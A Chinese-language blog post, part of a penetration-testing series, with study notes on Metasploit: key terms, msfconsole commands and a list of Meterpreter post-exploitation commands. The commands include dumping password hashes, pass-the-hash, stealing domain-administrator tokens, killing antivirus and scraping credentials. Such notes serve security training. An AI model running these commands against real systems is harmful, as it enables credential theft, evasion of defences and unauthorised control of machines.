渗透测试-37:Metasploit
相关概念
- 渗透攻击(Exploit):指攻击者利用安全漏洞进行攻击的行为
- 攻击载荷(Payload):指期望目标系统在被渗透攻击之后去执行的代码
- Shellcode:指渗透攻击时作为攻击载荷运行的一组机器指令,通常以汇编编写,通常目标系统执行了 shellcode 之后,才会提供一个 shell 或者 Meterpreter shell
- 模块(module): 指 Metasploit 中的一段软件代码组件
- 监听器(Listener):指 Metasploit 中用来等待连入网络连接的组件
Msfvenom
- Payload 生成器
- 显示帮助:
msfvenom -h
Metasplioit
# 进入 MSF 命令行 msfconsole # 显示 MSF 中所有可用的攻击模块 msf> show exploits # 显示 MSF 中所有可用的辅助模块 msf> show auxiliary # 显示当前模块正确运行所需要设置的参数 msf> show options # 显示所有可用的攻击载荷 msf> show payloads # 显示攻击目标的类型 msf> show targets # 显示当前模块的使用详情 msf> info # set 设置参数,unset 禁用设置或取消设置 msf> set/unset # setg/unsetg 命令能够对全局参数进行设置或者清除 msf> setg/unsetg # 使用setg命令对全局参数设置后,可以使用save将当前的设置值保存下去,下次启动的时候还可以使用这些值 msf> save
Meterpreter
- Meterpreter 是 MSF 中的一个扩展模块,如果选择了 Meterpreter 作为攻击载荷,就能够取得目标系统上的一个 Meterpreter shell 连接,号称黑客瑞士军刀
- 功能包括:纯内存工作模式、获取密码哈希、提权、跳板攻击等
常用命令
# 获得一个 meterpreter shell,查看当前用户 getuid # 截屏 screenshot # 获取系统运行平台的信息 sysinfo # 查看进程 ps # 进程迁移,将当前 shell 的进程迁移到指定 PID 的进程 migrate 1712 # 查看当前的进程 id getpid # 获取特权 use priv # 提取 hash run post/windows/gather/hashdump # 哈希传递 use exploit/windows/smb/psexec # 假冒令牌 # 进入一个高权限的 shell,然后靶机上登录过多个账号,包括域管理员,窃取 PID 对应账户的令牌 steal_token <域管理员的PID> # 或加载:use incognito 来模拟令牌 list_tokens -u impersonte_token ROOT\\administrator getuid # 关闭杀软 run killav # 或 run post/windows/manage/killav # 获取目标系统任何信息:用户名、密码、注册表、密码哈希等 run scraper
本文作者:颜趣空间
本文链接:https://www.cnblogs.com/toki-plus/p/16286635.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步